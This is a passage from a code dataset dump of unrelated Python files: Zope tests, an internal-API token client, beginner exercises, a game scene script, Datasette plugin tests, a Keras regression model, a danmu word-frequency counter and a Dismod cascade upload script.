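from watchdog.events import PatternMatchingEventHandler
import time

handler = PatternMatchingEventHandler(patterns=["*.html", "*.css"])
observer = Observer()
observer.schedule(handler, ".", recursive=True)  # in LemonSync: config.watch_dir
observer.start()
try:
    time.sleep(1)  # real code loops until interrupted
finally:
    observer.stop()
    observer.join()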
A copy of the ZVSL should accompany this\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\"\"\"\n\n$Id$\n\"\"\"\nimport unittest\nfrom zope.app.testing import placelesssetup\nfrom zope import component, interface\nimport zope.publisher.interfaces.browser\nimport zope.schema.interfaces\nimport zope.app.form.browser\nfrom zc.sharing import policy\nimport zc.sharing.sharing\nimport zc.table.interfaces\nimport zc.table.table\n\nclass ICon:\n \n def __init__(self, name):\n self.name = name\n\n def __call__(self, request=None):\n if request is None:\n return 'http://mysite/%s' % self.name\n \n return self\n\ndef sharingSetUp(test):\n placelesssetup.setUp(test)\n component.provideAdapter(\n zope.app.form.browser.CheckBoxWidget,\n (zope.schema.interfaces.IBool,\n zope.publisher.interfaces.browser.IBrowserRequest,\n ),\n zope.app.form.interfaces.IInputWidget)\n component.provideAdapter(\n ICon('user_icon.gif'),\n [zope.publisher.interfaces.browser.IBrowserRequest],\n interface.Interface, 'user_icon.gif')\n component.provideAdapter(\n ICon('group_icon.gif'),\n [zope.publisher.interfaces.browser.IBrowserRequest],\n interface.Interface, 'group_icon.gif')\n interface.directlyProvides(zc.table.table.FormFullFormatter,\n zc.table.interfaces.IFormatterFactory)\n component.provideUtility(zc.table.table.FormFullFormatter,\n zc.table.interfaces.IFormatterFactory)\n\ndef sharingTearDown(test):\n placelesssetup.tearDown()\n zc.sharing.sharing.clearPrivileges()\n\ndef test_suite():\n from zope.testing import doctest\n return unittest.TestSuite((\n doctest.DocFileSuite(\n 'sharing.txt',\n setUp=sharingSetUp, tearDown=sharingTearDown,\n optionflags=doctest.NORMALIZE_WHITESPACE,\n ),\n ))\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n","sub_path":"zc.sharing/trunk/src/zc/sharing/browser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"457059901","text":"#-*- coding:utf-8 -*-\n__author__ = 'TAOQIN001'\n\n\nfrom datetime import datetime\nimport json\nimport hmac\nimport hashlib\nimport traceback\nimport uuid\nfrom urllib.parse import unquote\nimport requests\n\nclass GetToken(object):\n\n def __init__(self, user, pwd , endpoint=\"http://10.1.249.11:8070/api\"):\n self.echoToken = str(uuid.uuid1())\n self.user = user\n self.pwd = pwd\n self.endpoint = endpoint\n\n def get_caller_and_secrets(self):\n try:\n r = requests.get(url=self.endpoint + \"/Caller\", timeout=60)\n caller = str((json.loads(r.content)[0]).split(':')[1])\n except Exception:\n traceback.print_exc()\n raise Exception(u\"get caller failed lead to get access token failed\")\n else:\n try:\n headers = {\"echoToken\": str(self.echoToken)}\n r = requests.post(url=self.endpoint + \"/Caller?Key=\" + caller, headers=headers).content\n secrets = unquote(r.split(\",\")[1].split(\":\")[1])\n if secrets[-1] == '\"':\n secrets = secrets[:-2]\n except Exception:\n traceback.print_exc()\n raise Exception(u\"get secrets failed lead to get access token failed\")\n return caller, secrets\n\n\n def CalculateTokenSign(self):\n '''\n 根据caller和secret计算获取access token的签名\n '''\n caller, secret = 
self.get_caller_and_secrets()\n strDate = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n tokenSign = hmac.new(secret, caller + strDate, hashlib.md5).hexdigest()\n return tokenSign, strDate, caller\n\n\n def get_token(self):\n \"\"\"\n # Get the user_token and access_token for the auth environment\n # The return type is a list\n # containing, in order: user_token, access_token\n \"\"\"\n result = list()\n # Compute the CallerId, SignDate and Sign values; then call the AccessToken endpoint to obtain the AccessToken.\n tokenSign, strDate, caller = self.CalculateTokenSign()\n token_sign = json.dumps({'CallerId': caller, 'Sign': tokenSign, 'SignDate': strDate})\n url2 = self.endpoint + \"/AccessToken\"\n headers = {\"Content-Type\": \"application/json\"}\n headers[\"echoToken\"] = str(self.echoToken)\n try:\n r2 = requests.post(url=url2, data=token_sign, headers=headers, timeout=60)\n assert r2.status_code == 200, \"status_code is not 200.{0},{1}\".format(url2, r2.status_code)\n except:\n traceback.print_exc()\n else:\n try:\n access_token = json.loads(r2.text)['AccessToken']\n except:\n traceback.print_exc()\n else:\n # First call the login endpoint /api/Login to get the STToken; then call /api/Token to get the UserToken\n url3 = self.endpoint + \"/Login\"\n headers = dict()\n headers[\"Content-Type\"] = \"application/json\"\n headers[\"AccessToken\"] = access_token\n headers[\"echoToken\"] = str(self.echoToken)\n data_dict = dict()\n data_dict[\"Username\"] = self.user\n data_dict[\"Password\"] = self.pwd\n\n data_dict[\"HmacSign\"] = \"niwei001\"\n data = json.dumps(data_dict, ensure_ascii=False)\n try:\n r3 = requests.post(url=url3, data=data, headers=headers, timeout=60)\n assert r3.status_code == 200, \"status_code is not 200\"\n except:\n traceback.print_exc()\n else:\n try:\n st_token = json.loads(r3.text)[\"St\"][\"STToken\"]\n except:\n traceback.print_exc()\n else:\n url4 = self.endpoint + \"/Token\"\n headers = dict()\n headers[\"Content-Type\"] = \"application/json\"\n headers[\"AccessToken\"] = access_token\n headers[\"echoToken\"] = str(self.echoToken)\n data_dict = dict()\n data_dict[\"STToken\"] = st_token\n data_dict[\"HmacSign\"] = \"niwei001\"\n data = json.dumps(data_dict, ensure_ascii=False)\n try:\n r4 = requests.post(url=url4, data=data, headers=headers, timeout=60)\n assert r4.status_code == 200, \"status_code is not 200\"\n except:\n traceback.print_exc()\n else:\n try:\n user_token = json.loads(r4.text)['Token']\n except:\n traceback.print_exc()\n else:\n # Pack the tokens into the result list\n result.append(user_token)\n result.append(access_token)\n try:\n a = result[0]  # fail loudly if no token was collected\n except Exception as e:\n raise Exception(str(e) + \"\\nget token list is \" + str(result))\n return result\n\n# if __name__ == \"__main__\":\n# a = GetToken(\"13761701741\", \"a\")\n# print a.get_token()\n","sub_path":"utils/hhub3/gettoken.py","file_name":"gettoken.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"422675199","text":"\"\"\"The user enters the coordinates of two cells. The program determines whether\r\na bishop could make that move\"\"\"\n\"\"\"\nblack squares: x even, y even or x odd, y odd\nwhite squares: x even, y odd or x odd, y even\n\"\"\"\r\n\nprint(\"Please, enter four coordinates from 1 to 8 in format X\")\r\n\nx1=int(input(\"X1 is: \"))\r\n\ny1=int(input(\"Y1 is: \"))\r\n\nx2=int(input(\"X2 is: \"))\r\n\ny2=int(input(\"Y2 is: \"))\r\n\nif (x1%2==1 and y1%2==1) or (x1%2==0 and y1%2==0): #for first - black \n \r\n\tif (x2%2==1 and y2%2==1) or (x2%2==0 and y2%2==0): #for second - black \n \r\n\t\tprint(\"TRUE\") \n \r\n\telse: #for second - white \n \r\n\t\tprint(\"FALSE\") \r\n\nelse: #for first - white \n \r\n\tif (x2%2==1 and y2%2==0) or (x2%2==0 and y2%2==1): #for second - white \n \r\n\t\tprint(\"TRUE\") \n \r\n\telse: #for second - black \n \r\n\t\tprint(\"FALSE\")\r\n\nif (x2-x1==y1-y2) or (x2-x1==y2-y1):\n \r\n\tprint(\"YES\")\r\n\nelif (x1-x2==y1-y2) or (x1-x2==y2-y1):\n \r\n\tprint(\"YES\")\r\n\nelse:\n \r\n\tprint(\"NO\")\r\n\r\n#----------------------------------------------------------------------------\r\npin_throw = input()\r\n\r\nN = int(pin_throw.split()[0])\r\n\r\nK = int(pin_throw.split()[1])\r\n\r\nlist_to_compare = []\r\n\r\nlist_a = []\r\n\r\nfor j in range(1, N + 1):\r\n list_to_compare.append(j)\r\n\r\nfor i in range(K):\r\n\r\n row = input()\r\n\r\n left = int(row.split()[0])\r\n\r\n right = int(row.split()[1])\r\n\r\n for i in range(left, right + 1):\r\n list_a.append(i)\r\n\r\nfor element in list_to_compare:\r\n\r\n if element in list_a:\r\n\r\n print('.', end=\"\")\r\n\r\n else:\r\n\r\n print('I', end=\"\")\r\n#---------------------------------------------------------------------------------------------------------------\r\nnum_list = []\r\nnum_count = int (input (\"Enter count\"))\r\nwhile len(num_list) < num_count:\r\n num_list.append(int(input('Enter a number')))\r\nprint (num_list)\r\nsum = 0\r\nfor i in range (0,len(num_list)):\r\n sum += num_list[i]\r\nprint (sum)\r\n#------------------------------------------------------------------------------------------------------------------\r\nnum_list = []\r\nnum_count = int (input (\"Enter count\"))\r\nwhile len(num_list) < num_count:\r\n num_list.append(int(input('Enter a number')))\r\nprint (num_list)\r\ni = 0\r\nsum = 0\r\nwhile i != len(num_list):\r\n sum += num_list[i]\r\n i += 1\r\nprint (sum)","sub_path":"homework_8.py","file_name":"homework_8.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"240164899","text":"###############################################################################\n#\tFilename:\tItari8_S.py\n#\t\n#\tConfidential and Proprietary, Copyright 2001 by Totally Games\n#\t\n#\tCreates Itari 8 static objects. 
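# The bishop exercise above reduces to two facts: a bishop move requires
# |dx| == |dy| (a shared diagonal), and any two squares on a shared diagonal
# automatically have the same colour, which the parity check verifies
# separately. A compact restatement:
def bishop_can_move(x1, y1, x2, y2):
    return (x1, y1) != (x2, y2) and abs(x1 - x2) == abs(y1 - y2)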
\n#\tCalled by Itari8.py when region is created\n#\t\n#\tCreated:\t10/04/01 - Tony Evans (Added Header)\n#\tModified:\t10/04/01 - Tony Evans\n###############################################################################\nimport App\nimport Tactical.LensFlares\n\ndef Initialize(pSet):\n\t# Add a sun, far far away\n\tpSun = App.Sun_Create(500.0, 500, 500)\n\tpSet.AddObjectToSet(pSun, \"Sun\")\n\t\n\t# Place the object at the specified location.\n\tpSun.PlaceObjectByName( \"Sun\" )\n\tpSun.UpdateNodeOnly()\n\n\t# Builds a Red-Orange lens flare, attached to the sun\n\tTactical.LensFlares.YellowLensFlare(pSet, pSun)\n\n\t# Planet\n\tpPlanet = App.Planet_Create(360.0, \"data/models/environment/BlueWhiteGasPlanet.nif\")\n\tpSet.AddObjectToSet(pPlanet, \"Itari 8\")\n\n\t# Place the object at the specified location.\n\tpPlanet.PlaceObjectByName( \"Planet\" )\n\tpPlanet.UpdateNodeOnly()\n\n\timport Custom.NanoFXv2.NanoFX_Lib\n\tCustom.NanoFXv2.NanoFX_Lib.CreateAtmosphereFX(pPlanet, \"data/models/environment/BlueWhiteGasPlanet.nif\", \"Class-M\")\n\n\t#Moon2\n\tpMoon2 = App.Planet_Create(90.0, \"data/models/environment/GreenPurplePlanet.nif\")\n\tpSet.AddObjectToSet(pMoon2, \"Moon 1\")\n\n\t# Place the object at the specified location.\n\tpMoon2.PlaceObjectByName( \"Moon1\" )\n\tpMoon2.UpdateNodeOnly()\n\n\t#Moon1\n\tpMoon1 = App.Planet_Create(15.0, \"data/models/environment/GrayPlanet.nif\")\n\tpSet.AddObjectToSet(pMoon1, \"Moon 2\")\n\n\t# Place the object at the specified location.\n\tpMoon1.PlaceObjectByName( \"Moon2\" )\n\tpMoon1.UpdateNodeOnly()\n\n\n\n","sub_path":"scripts/Custom/NanoFXv2/SpecialFX/Systems/Itari/Itari8_S.py","file_name":"Itari8_S.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252399369","text":"from bs4 import BeautifulSoup as Soup\nfrom .fixtures import app_client, make_app_client, TEMP_PLUGIN_SECRET_FILE # noqa\nfrom datasette.utils import sqlite3\nimport base64\nimport json\nimport os\nimport pathlib\nimport re\nimport pytest\nimport urllib\n\n\ndef test_plugins_dir_plugin(app_client):\n response = app_client.get(\n \"/fixtures.json?sql=select+convert_units(100%2C+'m'%2C+'ft')\"\n )\n assert pytest.approx(328.0839) == response.json[\"rows\"][0][0]\n\n\n@pytest.mark.parametrize(\n \"path,expected_decoded_object\",\n [\n (\"/\", {\"template\": \"index.html\", \"database\": None, \"table\": None}),\n (\n \"/fixtures/\",\n {\"template\": \"database.html\", \"database\": \"fixtures\", \"table\": None},\n ),\n (\n \"/fixtures/sortable\",\n {\"template\": \"table.html\", \"database\": \"fixtures\", \"table\": \"sortable\"},\n ),\n ],\n)\ndef test_plugin_extra_css_urls(app_client, path, expected_decoded_object):\n response = app_client.get(path)\n links = Soup(response.body, \"html.parser\").findAll(\"link\")\n special_href = [\n l for l in links if l.attrs[\"href\"].endswith(\"/extra-css-urls-demo.css\")\n ][0][\"href\"]\n # This link has a base64-encoded JSON blob in it\n encoded = special_href.split(\"/\")[3]\n assert expected_decoded_object == json.loads(\n base64.b64decode(encoded).decode(\"utf8\")\n )\n\n\ndef test_plugin_extra_js_urls(app_client):\n response = app_client.get(\"/\")\n scripts = Soup(response.body, \"html.parser\").findAll(\"script\")\n assert [\n s\n for s in scripts\n if s.attrs\n == {\n \"integrity\": \"SRIHASH\",\n \"crossorigin\": \"anonymous\",\n \"src\": \"https://example.com/jquery.js\",\n }\n ]\n\n\ndef 
test_plugins_with_duplicate_js_urls(app_client):\n # If two plugins both require jQuery, jQuery should be loaded only once\n response = app_client.get(\"/fixtures\")\n # This test is a little tricky, as if the user has any other plugins in\n # their current virtual environment those may affect what comes back too.\n # What matters is that https://example.com/jquery.js is only there once\n # and it comes before plugin1.js and plugin2.js which could be in either\n # order\n scripts = Soup(response.body, \"html.parser\").findAll(\"script\")\n srcs = [s[\"src\"] for s in scripts if s.get(\"src\")]\n # No duplicates allowed:\n assert len(srcs) == len(set(srcs))\n # jquery.js loaded once:\n assert 1 == srcs.count(\"https://example.com/jquery.js\")\n # plugin1.js and plugin2.js are both there:\n assert 1 == srcs.count(\"https://example.com/plugin1.js\")\n assert 1 == srcs.count(\"https://example.com/plugin2.js\")\n # jquery comes before them both\n assert srcs.index(\"https://example.com/jquery.js\") < srcs.index(\n \"https://example.com/plugin1.js\"\n )\n assert srcs.index(\"https://example.com/jquery.js\") < srcs.index(\n \"https://example.com/plugin2.js\"\n )\n\n\ndef test_plugins_render_cell_link_from_json(app_client):\n sql = \"\"\"\n select '{\"href\": \"http://example.com/\", \"label\":\"Example\"}'\n \"\"\".strip()\n path = \"/fixtures?\" + urllib.parse.urlencode({\"sql\": sql})\n response = app_client.get(path)\n td = Soup(response.body, \"html.parser\").find(\"table\").find(\"tbody\").find(\"td\")\n a = td.find(\"a\")\n assert a is not None, str(a)\n assert a.attrs[\"href\"] == \"http://example.com/\"\n assert a.attrs[\"data-database\"] == \"fixtures\"\n assert a.text == \"Example\"\n\n\ndef test_plugins_render_cell_demo(app_client):\n response = app_client.get(\"/fixtures/simple_primary_key?id=4\")\n soup = Soup(response.body, \"html.parser\")\n td = soup.find(\"td\", {\"class\": \"col-content\"})\n assert {\n \"column\": \"content\",\n \"table\": \"simple_primary_key\",\n \"database\": \"fixtures\",\n \"config\": {\"depth\": \"table\", \"special\": \"this-is-simple_primary_key\"},\n } == json.loads(td.string)\n\n\ndef test_plugin_config(app_client):\n assert {\"depth\": \"table\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\", table=\"sortable\"\n )\n assert {\"depth\": \"database\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\", table=\"unknown_table\"\n )\n assert {\"depth\": \"database\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\"\n )\n assert {\"depth\": \"root\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"unknown_database\"\n )\n assert {\"depth\": \"root\"} == app_client.ds.plugin_config(\"name-of-plugin\")\n assert None is app_client.ds.plugin_config(\"unknown-plugin\")\n\n\ndef test_plugin_config_env(app_client):\n os.environ[\"FOO_ENV\"] = \"FROM_ENVIRONMENT\"\n assert {\"foo\": \"FROM_ENVIRONMENT\"} == app_client.ds.plugin_config(\"env-plugin\")\n # Ensure secrets aren't visible in /-/metadata.json\n metadata = app_client.get(\"/-/metadata.json\")\n assert {\"foo\": {\"$env\": \"FOO_ENV\"}} == metadata.json[\"plugins\"][\"env-plugin\"]\n del os.environ[\"FOO_ENV\"]\n\n\ndef test_plugin_config_file(app_client):\n open(TEMP_PLUGIN_SECRET_FILE, \"w\").write(\"FROM_FILE\")\n assert {\"foo\": \"FROM_FILE\"} == app_client.ds.plugin_config(\"file-plugin\")\n # Ensure secrets aren't visible in /-/metadata.json\n metadata = app_client.get(\"/-/metadata.json\")\n assert 
{\"foo\": {\"$file\": TEMP_PLUGIN_SECRET_FILE}} == metadata.json[\"plugins\"][\n \"file-plugin\"\n ]\n os.remove(TEMP_PLUGIN_SECRET_FILE)\n\n\n@pytest.mark.parametrize(\n \"path,expected_extra_body_script\",\n [\n (\n \"/\",\n {\n \"template\": \"index.html\",\n \"database\": None,\n \"table\": None,\n \"config\": {\"depth\": \"root\"},\n },\n ),\n (\n \"/fixtures/\",\n {\n \"template\": \"database.html\",\n \"database\": \"fixtures\",\n \"table\": None,\n \"config\": {\"depth\": \"database\"},\n },\n ),\n (\n \"/fixtures/sortable\",\n {\n \"template\": \"table.html\",\n \"database\": \"fixtures\",\n \"table\": \"sortable\",\n \"config\": {\"depth\": \"table\"},\n },\n ),\n ],\n)\ndef test_plugins_extra_body_script(app_client, path, expected_extra_body_script):\n r = re.compile(r\"\")\n json_data = r.search(app_client.get(path).body.decode(\"utf8\")).group(1)\n actual_data = json.loads(json_data)\n assert expected_extra_body_script == actual_data\n\n\ndef test_plugins_asgi_wrapper(app_client):\n response = app_client.get(\"/fixtures\")\n assert \"fixtures\" == response.headers[\"x-databases\"]\n\n\ndef test_plugins_extra_template_vars(restore_working_directory):\n for client in make_app_client(\n template_dir=str(pathlib.Path(__file__).parent / \"test_templates\")\n ):\n response = client.get(\"/-/metadata\")\n assert response.status == 200\n extra_template_vars = json.loads(\n Soup(response.body, \"html.parser\").select(\"pre.extra_template_vars\")[0].text\n )\n assert {\n \"template\": \"show_json.html\",\n \"scope_path\": \"/-/metadata\",\n } == extra_template_vars\n extra_template_vars_from_awaitable = json.loads(\n Soup(response.body, \"html.parser\")\n .select(\"pre.extra_template_vars_from_awaitable\")[0]\n .text\n )\n assert {\n \"template\": \"show_json.html\",\n \"awaitable\": True,\n \"scope_path\": \"/-/metadata\",\n } == extra_template_vars_from_awaitable\n\n\ndef test_plugins_async_template_function(restore_working_directory):\n for client in make_app_client(\n template_dir=str(pathlib.Path(__file__).parent / \"test_templates\")\n ):\n response = client.get(\"/-/metadata\")\n assert response.status == 200\n extra_from_awaitable_function = (\n Soup(response.body, \"html.parser\")\n .select(\"pre.extra_from_awaitable_function\")[0]\n .text\n )\n expected = (\n sqlite3.connect(\":memory:\").execute(\"select sqlite_version()\").fetchone()[0]\n )\n assert expected == extra_from_awaitable_function\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"287121963","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, SimpleRNN, Activation , Dropout\nfrom sklearn.metrics import mean_squared_error\nfrom keras.optimizers import RMSprop, Adam\nfrom numpy.random import seed\nfrom common_misc import load_data_from_pkl\n\n\n# Create model\ndef create_fc_model():\n model = Sequential([\n Dense(30, input_dim=15, kernel_initializer='RandomNormal'),\n Activation('elu'),\n Dropout(rate=0.4, seed=True),\n Dense(10),\n Activation('elu'),\n Dense(1)\n ])\n return model\n\n# Create model\ndef create_fc_model2():\n model = Sequential()\n model.add(\n SimpleRNN(20, stateful=False, return_sequences=False, batch_input_shape=(1, 15, 1), activation='relu'))\n model.add(Dense(1))\n return model\n\n\nx_train, y_train = 
load_data_from_pkl('data/turbine_1_train.pkl')\nx_test, y_test = load_data_from_pkl('data/turbine_1_test.pkl')\n\ndata_train = pd.concat([x_train, y_train], axis=1)\ndata_test = pd.concat([x_test, y_test], axis=1)\n\n# drop out nan value\ndata_train = data_train.dropna(subset=['Y.ws_tb'])\ndata_train = data_train[np.isnan(data_train['GFS0.ws']) == False]\ndata_train = data_train[np.isnan(data_train['WRF0.ws']) == False]\ndata_test = data_test.dropna(subset=['Y.ws_tb'])\n\nx_train = data_train[['EC0.ws','EC0.wd','EC0.tmp','EC0.rho','EC0.pres',\n'GFS0.ws','GFS0.wd','GFS0.tmp','GFS0.rho','GFS0.pres',\n'WRF0.ws','WRF0.wd','WRF0.tmp','WRF0.rho','WRF0.pres']]\ncount1=len(x_train)\nprint(count1)\ny_train=data_train['Y.ws_tb']\nx_test=data_test[['EC0.ws','EC0.wd','EC0.tmp','EC0.rho','EC0.pres',\n'GFS0.ws','GFS0.wd','GFS0.tmp','GFS0.rho','GFS0.pres',\n'WRF0.ws','WRF0.wd','WRF0.tmp','WRF0.rho','WRF0.pres']]\ncount2=len(x_test)\ny_test=data_test['Y.ws_tb']\n\n\"\"\"\nx_train=x_train.values\nx_train = x_train.reshape(count1,15,1)\ny_train=y_train.values\ny_train = y_train.reshape(count1,1)\nx_test=x_test.values\nx_test = x_test.reshape(count2,15,1)\ny_test=y_test.values\ny_test = y_test.reshape(count2,1)\n\"\"\"\n\nprint('x_train.shape: ', x_train.shape)\nprint('y_train.shape: ', y_train.shape)\nprint('x_test.shape: ', x_test.shape)\nprint('y_test.shape: ', y_test.shape)\n\n\nepochs=20\n# Create the model\nprint('Creating Fully-Connected Model...')\nmodel_fc = create_fc_model()\nadam=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.00005)\nrmsprop = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.00005)\nmodel_fc.compile(optimizer=adam, loss='mean_squared_error')\n# Train the model\nprint('Training')\n##### TRAIN YOUR MODEL #####\nhistory = model_fc.fit(x_train, y_train, epochs=epochs, batch_size=1, validation_data=(x_test, y_test), shuffle=False)\n\n# Plot and save loss curves of training and test set vs iteration in the same graph\n##### PLOT AND SAVE LOSS CURVES #####\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\npredicted_fc = model_fc.predict(x_test, batch_size=1)\n##### CALCULATE RMSE #####\nfc_rmse = np.sqrt(mean_squared_error(y_test, predicted_fc))\nprint(fc_rmse)\n\nplt.figure(figsize=(8, 5))\nplt.plot(np.arange(1, epochs+1), loss, label='train_loss')\nplt.plot(np.arange(1, epochs+1), val_loss, label='val_loss')\nplt.title('Loss vs Iterations in Training and Validation Set')\nplt.xlabel('Iterations')\nplt.ylabel('Loss')\nx_label = range(1, epochs+1)\nplt.xticks(x_label)\nplt.legend()\nplt.grid()\nplt.show()\n\n","sub_path":"envision/neural network.py","file_name":"neural network.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"54793784","text":"'''\n统计弹幕中词语出现的频率\n'''\n\nimport jieba\nimport fool\nimport time\nimport datetime\nfrom dbHelper import DouyuDanmuDao\nimport targetConfig\n\n#从数据库获取弹幕内容\ndef getBarragesFromDatabase(date):\n date = date.timetuple() # 转换时间格式\n\n SQL = f\"select txt from barrages \" \\\n f\" where Date(stime)=\\'{targetConfig.targetDate.strftime('%Y-%m-%d')}\\'\"\n\n danmuDao = DouyuDanmuDao()\n danmuDao.connect()\n\n data = danmuDao.excuteQuery(SQL)\n if not data:\n return -1\n\n danmuDao.disConnect()\n return data\n\n\n#统计弹幕中的词频\ndef getWordStatsWithJieba(data):\n \"\"\"\n :param data: tuple类型的数据,data【n】【0】是弹幕数据\n :return:\n \"\"\"\n wordFrequency = {}\n\n for i in range(len(data)):\n barrage = data[i][0]\n for word in 
jieba.cut_for_search(barrage):\n if word in wordFrequency.keys():\n wordFrequency[word]+=1\n else:\n wordFrequency[word] = 1\n return wordFrequency\n\ndef getWordStatsWithFool(data):\n \"\"\"\n\n :param data: tuple-typed data; data[n][0] is the danmu text\n :return:\n \"\"\"\n wordFrequency = {}\n\n for i in range(len(data)):\n barrage = data[i][0]\n # print(fool.cut(barrage))\n for word in fool.cut(barrage)[0]:\n # print(word)\n if word in wordFrequency.keys():\n wordFrequency[word]+=1\n else:\n wordFrequency[word] = 1\n return wordFrequency\n\n\n# Draw the word cloud chart\nfrom pyecharts.charts import WordCloud\nfrom pyecharts import options as opts\nfrom pyecharts.globals import SymbolType\n\ndef wordCloud(barrageStats):\n # WordCloud module: chain the configuration calls and finally render an html file\n c = (\n WordCloud()\n .add(\"\", barrageStats, word_size_range=[20, 100], shape=SymbolType.DIAMOND)\n .set_global_opts(title_opts=opts.TitleOpts(title=\"词语频率\"))\n .render(\"词语频率.html\")\n )\n\n\n# Main function\ndef main():\n date = targetConfig.targetDate\n data = getBarragesFromDatabase(date)\n print(type(data))\n print(data)\n\n # Get the word frequencies\n wordStats = getWordStatsWithJieba(data)\n del data\n\n wordStats = sorted(wordStats.items(),key=lambda item:item[1],reverse=True)\n print(wordStats)\n for word in wordStats[:50]:\n print(word)\n wordCloud(wordStats)\n\nif __name__ == '__main__':\n main()","sub_path":"src/DataAnalysis/wordFrequency.py","file_name":"wordFrequency.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336989529","text":"import logging\nimport os\nimport re\nimport shutil\nimport subprocess\n\nfrom cascade_ode import upload\nfrom cascade_ode import fit_stats\nfrom cascade_ode import drill\nfrom cascade_ode.argument_parser import cascade_parser\nfrom cascade_ode.patch_io import setup_io_patches\nfrom cascade_ode.demographics import Demographics\nfrom cascade_ode import importer\nfrom cascade_ode import __version__\nfrom cascade_ode.run_all import prepare_directories\nfrom cascade_ode.setup_logger import setup_logger\nfrom cascade_ode.sge import get_commit_hash\nfrom cascade_ode.shared_functions import DismodSaveResults\nfrom db_tools.ezfuncs import query\nfrom db_queries import get_location_metadata\nfrom gbd.decomp_step import decomp_step_from_decomp_step_id\nimport sqlalchemy\n\n# Set default file mask to readable-for all users\nos.umask(0o0002)\n\n\ndef parse_args(args=None):\n parser = cascade_parser(\"Upload model, plot, aggregate up hierarchy.\")\n parser.add_argument('mvid', type=int)\n return parser.parse_args(args)\n\n\ndef main():\n '''Set commit hash, upload model, try to write effects_plots pdfs,\n aggregate model version draws up location hierarchy\n '''\n args = parse_args()\n mvid = args.mvid\n default_debug_level = -1\n dirs = prepare_directories(mvid, create_directories=False)\n logging_filepath = '%s/%s' % (\n dirs['model_logdir'], f'{args.mvid}_varnish.log')\n setup_logger(\n logging_filepath,\n level=args.quiet - args.verbose + default_debug_level)\n\n log = logging.getLogger(__name__)\n log.info(\"Varnish started for mvid {}\".format(mvid))\n setup_io_patches(args.no_upload)\n\n try:\n try:\n commit_hash = get_commit_hash(dir='%s/..' 
% drill.this_path)\n except subprocess.CalledProcessError:\n # in site-packages, not git repo\n commit_hash = __version__\n\n upload.set_commit_hash(mvid, commit_hash)\n upload.upload_model(mvid)\n\n outdir = \"%s/%s/full\" % (\n drill.settings['cascade_ode_out_dir'],\n str(mvid))\n joutdir = \"%s/%s\" % (drill.settings['diag_out_dir'], mvid)\n fit_df = fit_stats.write_fit_stats(mvid, outdir, joutdir)\n if fit_df is not None:\n try:\n upload.upload_fit_stat(mvid)\n except sqlalchemy.exc.IntegrityError:\n log.warning(\"fit stat already uploaded -- skipping\")\n else:\n log.warning(\"No fit stats computed\")\n\n # Write effect PDFs\n plotter = \"{}/effect_plots.r\".format(drill.this_path)\n plotter = os.path.realpath(plotter)\n\n demo = Demographics(mvid)\n try:\n subprocess.check_output([\n \"Rscript\",\n plotter,\n str(mvid),\n joutdir,\n drill.settings['cascade_ode_out_dir'],\n str(max(demo.year_ids))],\n stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n log.exception(\"Error in effect plots\")\n\n # Clean aggregations to ensure idempotentcy\n decomp_step = decomp_step_from_decomp_step_id(\n importer.get_model_version(mvid).decomp_step_id.unique()[0])\n clean_model_directory(outdir, demo.gbd_round_id, decomp_step)\n\n # Launch final aggregations\n log.info(\"Starting Save Results\")\n aggregate_model(mvid, demo=demo, no_upload=args.no_upload)\n except Exception:\n log.exception(\"Error in varnish\")\n raise\n\n\ndef aggregate_model(mvid, demo, no_upload=False):\n '''call save_results to create location aggregates,\n upload summaries to epi.model_estimate_final,\n mark model as finished'''\n agg_args = get_aggregation_arguments(mvid, demo)\n\n dsr = DismodSaveResults(\n input_dir=agg_args['input_dir'],\n input_file_pattern=agg_args['input_file_pattern'],\n model_version_id=mvid,\n modelable_entity_id=agg_args['modelable_entity_id'],\n description=agg_args['description'],\n year_id=agg_args['year_id'],\n sex_id=agg_args['sex_id'],\n measure_id=agg_args['measure_id'],\n db_env=agg_args['db_env'],\n gbd_round_id=agg_args['gbd_round_id'],\n birth_prevalence=agg_args['birth_prevalence'],\n decomp_step=agg_args['decomp_step'])\n if not no_upload:\n dsr.run()\n\n return dsr\n\n\ndef get_aggregation_arguments(mvid, demo):\n casc = drill.Cascade(\n mvid, root_dir=drill.settings['cascade_ode_out_dir'],\n reimport=False)\n mvm = casc.model_version_meta\n db_env = drill.settings['env_variables']['ENVIRONMENT_NAME']\n\n agg_args = {}\n agg_args['input_dir'] = os.path.join(casc.root_dir, 